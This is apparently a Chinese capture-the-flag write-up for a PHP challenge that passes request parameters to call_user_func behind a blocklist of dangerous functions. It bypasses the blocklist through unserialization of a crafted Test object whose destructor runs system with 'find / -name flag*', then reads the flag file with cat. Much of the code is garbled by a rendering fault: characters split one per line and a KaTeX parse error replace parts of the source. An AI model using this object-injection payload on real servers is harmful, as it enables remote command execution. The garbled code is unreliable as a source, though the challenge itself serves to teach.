call_user_func
用file_get_content函数获取index.php文件内容。
<?php
d
i
s
a
b
l
e
f
u
n
=
a
r
r
a
y
(
"
e
x
e
c
"
,
"
s
h
e
l
l
e
x
e
c
"
,
"
s
y
s
t
e
m
"
,
"
p
a
s
s
t
h
r
u
"
,
"
p
r
o
c
o
p
e
n
"
,
"
s
h
o
w
s
o
u
r
c
e
"
,
"
p
h
p
i
n
f
o
"
,
"
p
o
p
e
n
"
,
"
d
l
"
,
"
e
v
a
l
"
,
"
p
r
o
c
t
e
r
m
i
n
a
t
e
"
,
"
t
o
u
c
h
"
,
"
e
s
c
a
p
e
s
h
e
l
l
c
m
d
"
,
"
e
s
c
a
p
e
s
h
e
l
l
a
r
g
"
,
"
a
s
s
e
r
t
"
,
"
s
u
b
s
t
r
r
e
p
l
a
c
e
"
,
"
c
a
l
l
u
s
e
r
f
u
n
c
a
r
r
a
y
"
,
"
c
a
l
l
u
s
e
r
f
u
n
c
"
,
"
a
r
r
a
y
f
i
l
t
e
r
"
,
"
a
r
r
a
y
w
a
l
k
"
,
"
a
r
r
a
y
m
a
p
"
,
"
r
e
g
i
s
t
r
e
g
i
s
t
e
r
s
h
u
t
d
o
w
n
f
u
n
c
t
i
o
n
"
,
"
r
e
g
i
s
t
e
r
t
i
c
k
f
u
n
c
t
i
o
n
"
,
"
f
i
l
t
e
r
v
a
r
"
,
"
f
i
l
t
e
r
v
a
r
a
r
r
a
y
"
,
"
u
a
s
o
r
t
"
,
"
u
k
s
o
r
t
"
,
"
a
r
r
a
y
r
e
d
u
c
e
"
,
"
a
r
r
a
y
w
a
l
k
"
,
"
a
r
r
a
y
w
a
l
k
r
e
c
u
r
s
i
v
e
"
,
"
p
c
n
t
l
e
x
e
c
"
,
"
f
o
p
e
n
"
,
"
f
w
r
i
t
e
"
,
"
f
i
l
e
p
u
t
c
o
n
t
e
n
t
s
"
)
;
f
u
n
c
t
i
o
n
g
e
t
t
i
m
e
(
disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg", "assert","substr_replace","call_user_func_array", "call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function", "register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce" ,"array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"); function gettime(
disablefun=array("exec","shellexec","system","passthru","procopen","showsource","phpinfo","popen","dl","eval","procterminate","touch","escapeshellcmd","escapeshellarg","assert","substrreplace","calluserfuncarray","calluserfunc","arrayfilter","arraywalk","arraymap","registregistershutdownfunction","registertickfunction","filtervar","filtervararray","uasort","uksort","arrayreduce","arraywalk","arraywalkrecursive","pcntlexec","fopen","fwrite","fileputcontents");functiongettime(func, $p) {
r
e
s
u
l
t
=
c
a
l
l
u
s
e
r
f
u
n
c
(
result = call_user_func(
result=calluserfunc(func, $p);
a
=
g
e
t
t
y
p
e
(
a= gettype(
a=gettype(result);
if ($a == “string”) {
return $result;
} else {return “”;}
}
class Test {
var $p = “Y-m-d h:i:s a”;
var KaTeX parse error: Expected group after '_' at position 29: …; function _̲_destruct() { …this->func != “”) {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST[“func”];
$p =
R
E
Q
U
E
S
T
[
"
p
"
]
;
i
f
(
_REQUEST["p"]; if (
REQUEST["p"];if(func != null) {
f
u
n
c
=
s
t
r
t
o
l
o
w
e
r
(
func = strtolower(
func=strtolower(func);
if (!in_array(
f
u
n
c
,
func,
func,disable_fun)) {
echo gettime($func, $p);
}else {
die(“Hacker…”);
}
}
?>
这里发现他过滤了很多函数。通过反序列化函数调用Test类。
class Test {
var $p = "find / -name flag*";
var $func = "system";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$a=new Test();
echo serialize($a)
?>
find / -name flag:获取名字里面有flag的所有文件名。
cat /tmp/flagoefiu4r93:看文件内容